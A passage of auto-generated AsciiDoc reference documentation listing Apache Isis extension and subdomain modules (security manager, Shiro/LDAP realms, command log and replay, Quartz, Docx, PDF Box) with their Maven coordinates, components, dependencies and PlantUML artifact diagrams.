xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationService.adoc[PermissionsEvaluationService], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAbstract.adoc[PermissionsEvaluationServiceAbstract], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceAllowBeatsVeto.adoc[PermissionsEvaluationServiceAllowBeatsVeto], xref:refguide:extensions:index\/secman\/api\/permission\/PermissionsEvaluationServiceVetoBeatsAllow.adoc[PermissionsEvaluationServiceVetoBeatsAllow], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRole.adoc[ApplicationRole], xref:refguide:extensions:index\/secman\/api\/role\/ApplicationRoleRepository.adoc[ApplicationRoleRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancy.adoc[ApplicationTenancy], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyEvaluator.adoc[ApplicationTenancyEvaluator], xref:refguide:extensions:index\/secman\/api\/tenancy\/ApplicationTenancyRepository.adoc[ApplicationTenancyRepository], xref:refguide:extensions:index\/secman\/api\/tenancy\/HasAtPath.adoc[HasAtPath], xref:refguide:extensions:index\/secman\/api\/user\/AccountType.adoc[AccountType], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUser.adoc[ApplicationUser], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserRepository.adoc[ApplicationUserRepository], xref:refguide:extensions:index\/secman\/api\/user\/ApplicationUserStatus.adoc[ApplicationUserStatus]\n****\n\n|Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-encryption-jbcrypt\nType: jar\nDirectory: \/extensions\/security\/secman\/encryption-jbcrypt\n----\n|.Components\n****\no.a.i.extensions.secman.encryption.jbcrypt.services.PasswordEncryptionServiceUsingJBcrypt +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.mindrot:jbcrypt:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/IsisModuleExtSecmanEncryptionJbcrypt.adoc[IsisModuleExtSecmanEncryptionJbcrypt], xref:refguide:extensions:index\/secman\/encryption\/jbcrypt\/services\/PasswordEncryptionServiceUsingJBcrypt.adoc[PasswordEncryptionServiceUsingJBcrypt]\n****\n\n|Apache Isis Ext - Sec Man Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-model\nType: jar\nDirectory: \/extensions\/security\/secman\/model\n----\n|.Components\n****\no.a.i.extensions.secman.model.facets.TenantedAuthorizationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/model\/IsisModuleExtSecmanModel.adoc[IsisModuleExtSecmanModel], xref:refguide:extensions:index\/secman\/model\/dom\/user\/MeService.adoc[MeService]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jdo\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jdo\n----\n|.Components\n****\no.a.i.extensions.secman.jdo.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jdo.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jdo.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jdo.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jdo.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jdo\/IsisModuleExtSecmanPersistenceJdo.adoc[IsisModuleExtSecmanPersistenceJdo], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jdo\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jdo\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions]\n****\n\n|Apache Isis Ext - Sec Man Persistence (Using JPA)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-persistence-jpa\nType: jar\nDirectory: \/extensions\/security\/secman\/persistence-jpa\n----\n|.Components\n****\no.a.i.extensions.secman.jpa.dom.permission.ApplicationPermissionRepository +\no.a.i.extensions.secman.jpa.dom.role.ApplicationRoleRepository +\no.a.i.extensions.secman.jpa.dom.tenancy.ApplicationTenancyRepository +\no.a.i.extensions.secman.jpa.dom.user.ApplicationUserRepository +\no.a.i.extensions.secman.jpa.seed.SeedSecurityModuleService +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-model:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/jpa\/IsisModuleExtSecmanPersistenceJpa.adoc[IsisModuleExtSecmanPersistenceJpa], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedSecurityModuleService.adoc[SeedSecurityModuleService], xref:refguide:extensions:index\/secman\/jpa\/seed\/SeedUsersAndRolesFixtureScript.adoc[SeedUsersAndRolesFixtureScript], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/GlobalTenancy.adoc[GlobalTenancy], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtFixturesFixtureResultsRoleAndPermissions.adoc[IsisExtFixturesFixtureResultsRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminRoleAndPermissions.adoc[IsisExtSecmanAdminRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanAdminUser.adoc[IsisExtSecmanAdminUser], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanFixtureRoleAndPermissions.adoc[IsisExtSecmanFixtureRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/seed\/scripts\/IsisExtSecmanRegularUserRoleAndPermissions.adoc[IsisExtSecmanRegularUserRoleAndPermissions], xref:refguide:extensions:index\/secman\/jpa\/userreg\/SecurityModuleAppUserRegistrationServiceAbstract.adoc[SecurityModuleAppUserRegistrationServiceAbstract]\n****\n\n|Apache Isis Ext - Sec Man Realm (Using Shiro)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-shiro-realm\nType: jar\nDirectory: \/extensions\/security\/secman\/shiro-realm\n----\n|.Components\n****\no.a.i.extensions.secman.shiro.services.SecurityRealmServiceUsingShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-secman-api:jar:2.0.0-SNAPSHOT +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanRealmShiro.adoc[IsisModuleExtSecmanRealmShiro], xref:refguide:extensions:index\/secman\/shiro\/IsisModuleExtSecmanShiroRealm.adoc[IsisModuleExtSecmanShiroRealm], xref:refguide:extensions:index\/secman\/shiro\/services\/SecurityRealmServiceUsingShiro.adoc[SecurityRealmServiceUsingShiro], xref:refguide:extensions:index\/secman\/shiro\/util\/ShiroUtils.adoc[ShiroUtils]\n****\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap\nType: pom\nDirectory: \/extensions\/security\/shiro-realm-ldap\n----\n|Implementation of Shiro Realm using LDAP.\n\n|Apache Isis Ext - Security - Shiro LDAP Realm (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-shiro-realm-ldap-impl\nType: jar\nDirectory: \/extensions\/security\/shiro-realm-ldap\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapContextFactory.adoc[IsisLdapContextFactory], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisLdapRealm.adoc[IsisLdapRealm], xref:refguide:extensions:index\/shirorealmldap\/realm\/impl\/IsisModuleExtShiroRealmLdapImpl.adoc[IsisModuleExtShiroRealmLdapImpl]\n****\n|===\n\n=== Core: Command Log\n\n[plantuml,Core: Command Log,svg]\n----\n@startuml(id=Core:_Command_Log)\ntitle Core: Command Log - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Log\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Log\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Log Implementation (JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Log)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Log\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log\nType: pom\nDirectory: \/extensions\/core\/command-log\n----\n|Logs commands\n\n|Apache Isis Ext - Command Log Implementation (JDO)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-log-jdo\nType: jar\nDirectory: \/extensions\/core\/command-log\/impl\n----\n|.Components\n****\no.a.i.extensions.commandlog.impl.CommandSubscriberForJdo +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TableColumnOrderDefault +\no.a.i.extensions.commandlog.impl.jdo.CommandJdo$TitleProvider +\no.a.i.extensions.commandlog.impl.jdo.CommandJdoRepository +\no.a.i.extensions.commandlog.impl.ui.CommandServiceMenu +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.mavendeps:isis-mavendeps-jdo:pom:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandlog\/impl\/CommandSubscriberForJdo.adoc[CommandSubscriberForJdo], xref:refguide:extensions:index\/commandlog\/impl\/IsisModuleExtCommandLogImpl.adoc[IsisModuleExtCommandLogImpl], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasInteractionId_command.adoc[HasInteractionId_command], xref:refguide:extensions:index\/commandlog\/impl\/mixins\/HasUsername_recentCommandsByUser.adoc[HasUsername_recentCommandsByUser], xref:refguide:extensions:index\/commandlog\/impl\/ui\/CommandServiceMenu.adoc[CommandServiceMenu]\n****\n|===\n\n=== Core: Command Replay\n\n[plantuml,Core: Command Replay,svg]\n----\n@startuml(id=Core:_Command_Replay)\ntitle Core: Command Replay - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Command Replay\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Command Replay\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Command Replay for Primary\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Command Replay for Secondary\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Command Replay)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Command Replay\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay\nType: pom\nDirectory: \/extensions\/core\/command-replay\n----\n|Replays commands to secondary system\n\n|Apache Isis Ext - Command Replay for Primary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-primary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/primary\n----\n|A module for obtaining commands from a primary\n\n.Components\n****\no.a.i.extensions.commandreplay.primary.config.PrimaryConfig +\no.a.i.extensions.commandreplay.primary.spiimpl.CaptureResultOfCommand +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/primary\/IsisModuleExtCommandReplayPrimary.adoc[IsisModuleExtCommandReplayPrimary], xref:refguide:extensions:index\/commandreplay\/primary\/config\/PrimaryConfig.adoc[PrimaryConfig], xref:refguide:extensions:index\/commandreplay\/primary\/mixins\/Object_openOnSecondary.adoc[Object_openOnSecondary], xref:refguide:extensions:index\/commandreplay\/primary\/restapi\/CommandRetrievalService.adoc[CommandRetrievalService], xref:refguide:extensions:index\/commandreplay\/primary\/ui\/CommandReplayOnPrimaryService.adoc[CommandReplayOnPrimaryService]\n****\n\n|Apache Isis Ext - Command Replay for Secondary\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-command-replay-secondary\nType: jar\nDirectory: \/extensions\/core\/command-replay\/secondary\n----\n|A module providing a Quartz Job to run on a secondary system,\nfor obtaining commands from a primary and saving them so that they are replayed.\n\n.Components\n****\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserException +\no.a.i.extensions.commandreplay.secondary.analyser.CommandReplayAnalyserResult +\no.a.i.extensions.commandreplay.secondary.analysis.CommandReplayAnalysisService +\no.a.i.extensions.commandreplay.secondary.clock.TickingClockService +\no.a.i.extensions.commandreplay.secondary.config.SecondaryConfig +\no.a.i.extensions.commandreplay.secondary.executor.CommandExecutorServiceWithTime +\no.a.i.extensions.commandreplay.secondary.fetch.CommandFetcher +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-quartz-impl:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\norg.apache.isis.mappings:isis-mappings-jaxrsclient-impl:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/commandreplay\/secondary\/IsisModuleExtCommandReplaySecondary.adoc[IsisModuleExtCommandReplaySecondary], xref:refguide:extensions:index\/commandreplay\/secondary\/SecondaryStatus.adoc[SecondaryStatus], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyser.adoc[CommandReplayAnalyser], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserException.adoc[CommandReplayAnalyserException], xref:refguide:extensions:index\/commandreplay\/secondary\/analyser\/CommandReplayAnalyserResult.adoc[CommandReplayAnalyserResult], xref:refguide:extensions:index\/commandreplay\/secondary\/analysis\/CommandReplayAnalysisService.adoc[CommandReplayAnalysisService], xref:refguide:extensions:index\/commandreplay\/secondary\/clock\/TickingClockService.adoc[TickingClockService], xref:refguide:extensions:index\/commandreplay\/secondary\/config\/SecondaryConfig.adoc[SecondaryConfig], xref:refguide:extensions:index\/commandreplay\/secondary\/executor\/CommandExecutorServiceWithTime.adoc[CommandExecutorServiceWithTime], xref:refguide:extensions:index\/commandreplay\/secondary\/fetch\/CommandFetcher.adoc[CommandFetcher], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/ReplicateAndReplayJob.adoc[ReplicateAndReplayJob], xref:refguide:extensions:index\/commandreplay\/secondary\/job\/SecondaryStatusData.adoc[SecondaryStatusData], xref:refguide:extensions:index\/commandreplay\/secondary\/jobcallables\/ReplicateAndRunCommands.adoc[ReplicateAndRunCommands], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_exclude.adoc[CommandJdo_exclude], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/CommandJdo_replayQueue.adoc[CommandJdo_replayQueue], xref:refguide:extensions:index\/commandreplay\/secondary\/mixins\/Object_openOnPrimary.adoc[Object_openOnPrimary], xref:refguide:extensions:index\/commandreplay\/secondary\/spi\/ReplayCommandExecutionController.adoc[ReplayCommandExecutionController], xref:refguide:extensions:index\/commandreplay\/secondary\/ui\/CommandReplayOnSecondaryService.adoc[CommandReplayOnSecondaryService]\n****\n|===\n\n=== Core: Model Annotation\n\n[plantuml,Core: Model Annotation,svg]\n----\n@startuml(id=Core:_Model_Annotation)\ntitle Core: Model Annotation - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Model Annotation\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - @Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Core: Model Annotation)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - @Model\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-modelannotation\nType: jar\nDirectory: \/extensions\/core\/model-annotation\n----\n|Allows supporting methods to be annotated as @Model, to make explicit the bounds of the metamodel.\n\n.Components\n****\no.a.i.extensions.modelannotation.metamodel.services.IncubatorMetaModelPlugin +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/modelannotation\/applib\/IsisModuleIncModelApplib.adoc[IsisModuleIncModelApplib], xref:refguide:extensions:index\/modelannotation\/applib\/annotation\/Model.adoc[Model], xref:refguide:extensions:index\/modelannotation\/metamodel\/IsisModuleExtModelAnnotation.adoc[IsisModuleExtModelAnnotation], xref:refguide:extensions:index\/modelannotation\/metamodel\/facets\/SupportingMethodValidatorRefinerFactory.adoc[SupportingMethodValidatorRefinerFactory], xref:refguide:extensions:index\/modelannotation\/metamodel\/services\/IncubatorMetaModelPlugin.adoc[IncubatorMetaModelPlugin]\n****\n|===\n\n=== Core: Quartz\n\n[plantuml,Core: Quartz,svg]\n----\n@startuml(id=Core:_Quartz)\ntitle Core: Quartz - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Core: Quartz\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - Quartz\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Ext - Quartz Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Core: Quartz)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - Quartz\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz\nType: pom\nDirectory: \/extensions\/core\/quartz\n----\n|Integrates Quartz\n\n|Apache Isis Ext - Quartz Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-quartz-impl\nType: jar\nDirectory: \/extensions\/core\/quartz\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-command-log-jdo:jar:<managed> +\norg.springframework.boot:spring-boot-starter-quartz:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/quartz\/IsisModuleExtQuartzImpl.adoc[IsisModuleExtQuartzImpl], xref:refguide:extensions:index\/quartz\/context\/JobExecutionData.adoc[JobExecutionData], xref:refguide:extensions:index\/quartz\/spring\/AutowiringSpringBeanJobFactory.adoc[AutowiringSpringBeanJobFactory]\n****\n|===\n\n=== Security: Secman\n\n=== Security: Shiro LDAP Realm\n\n=== RO Viewer: CORS\n\n=== Wicket Viewer: Excel Download\n\n=== Wicket Viewer: Full Calendar\n\n=== Wicket Viewer: Pdf.js\n\n== Subdomains\n\n[plantuml,Subdomains,svg]\n----\n@startuml(id=Subdomains)\ntitle Subdomains - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Subdomains\\n[Software System]\" {\n rectangle \"==Apache Isis Sub - Docx (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Sub - Docx (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Sub - Freemarker (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Sub - Freemarker (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Sub - Ognl (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Sub - Ognl (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Sub - PDF Box (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Sub - PDF Box (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Sub - Zip (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Sub - Zip (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Subdomains\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n5 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n@enduml\n----\n.Projects\/Modules (Subdomains)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Subdomains\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains\nType: pom\nDirectory: \/subdomains\n----\n|A library of domain services and of supporting subdomains (often technical in nature), to be called from the\ncore domain of an Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Sub - Docx (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx\nType: pom\nDirectory: \/subdomains\/docx\n----\n|Uses the Apache POI library for mail merge functions of .docx Word documents\n\n|Apache Isis Sub - Docx (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-docx-applib\nType: jar\nDirectory: \/subdomains\/docx\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Freemarker (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker\nType: pom\nDirectory: \/subdomains\/freemarker\n----\n|Integrates Freemarker Library\n\n|Apache Isis Sub - Freemarker (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-freemarker-applib\nType: jar\nDirectory: \/subdomains\/freemarker\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - Ognl (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl\nType: pom\nDirectory: \/subdomains\/ognl\n----\n|Integrates Ognl Library\n\n|Apache Isis Sub - Ognl (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-ognl-applib\nType: jar\nDirectory: \/subdomains\/ognl\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n|Apache Isis Sub - PDF Box (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox\nType: pom\nDirectory: \/subdomains\/pdfbox\n----\n|Integrates PDF Box Library\n\n|Apache Isis Sub - PDF Box (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.subdomains\nArtifact: isis-subdomains-pdfbox-applib\nType: jar\nDirectory: \/subdomains\/pdfbox\/applib\n----\n|Integrates 